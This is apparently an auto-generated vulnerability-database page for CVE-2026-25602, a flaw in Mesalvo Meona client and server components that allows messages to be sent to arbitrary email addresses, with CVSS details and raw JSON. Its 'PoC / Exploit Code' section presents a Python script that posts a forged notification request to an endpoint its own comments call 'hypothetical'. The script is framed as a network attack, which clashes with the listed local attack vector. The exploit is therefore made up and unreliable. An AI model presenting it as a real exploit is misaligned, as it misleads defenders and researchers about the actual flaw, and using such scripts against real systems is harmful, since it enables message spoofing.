Security Vulnerability Report
CVE-2026-25602 CVSS 4.4 MEDIUM

CVE-2026-25602

Published: 2026-05-20 11:16:26
Last Modified: 2026-05-20 14:03:10
Source: a6d3dc9e-0591-4a13-bce7-0f5b31ff6158

Description

Insufficient Verification of Data Authenticity vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component makes it possible to send messages to any email address. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020.

CVSS Details

CVSS Score: 4.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Mesalvo Meona Client Launcher Component <= 19.06.2020 15:11:49
Mesalvo Meona Server Component <= 2025.04 5+323020

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Conceptual Proof of Concept for CVE-2026-25602
# Target: Mesalvo Meona Client/Server Component
# Description: Exploit insufficient verification to send email to arbitrary address


def exploit(target_ip, target_email):
    # Hypothetical endpoint vulnerable to the lack of data verification
    url = f"http://{target_ip}:8080/api/v1/send_notification"

    # Constructing the malicious payload
    # The vulnerability allows bypassing checks on the 'recipient' field
    payload = {
        "sender": "[email protected]",
        "recipient": target_email,  # Attacker controlled email
        "subject": "Unauthorized Message",
        "body": "This message was sent due to CVE-2026-25602."
    }

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Meona-Client/19.06.2020"
    }

    try:
        print(f"[*] Attempting to send message to {target_email}...")
        response = requests.post(url, json=payload, headers=headers, timeout=5)

        if response.status_code == 200:
            print("[+] Exploit successful! Message sent.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error during request: {e}")


if __name__ == "__main__":
    # Example usage
    target = "127.0.0.1"
    victim_email = "[email protected]"
    exploit(target, victim_email)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25602", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-20T11:16:26.313", "lastModified": "2026-05-20T14:03:10.193", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient Verification of Data Authenticity vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component makes it possible to send messages to any email address. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}]}], "references": [{"url": "https://seccore.at/blog/cves-meona/", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}]}}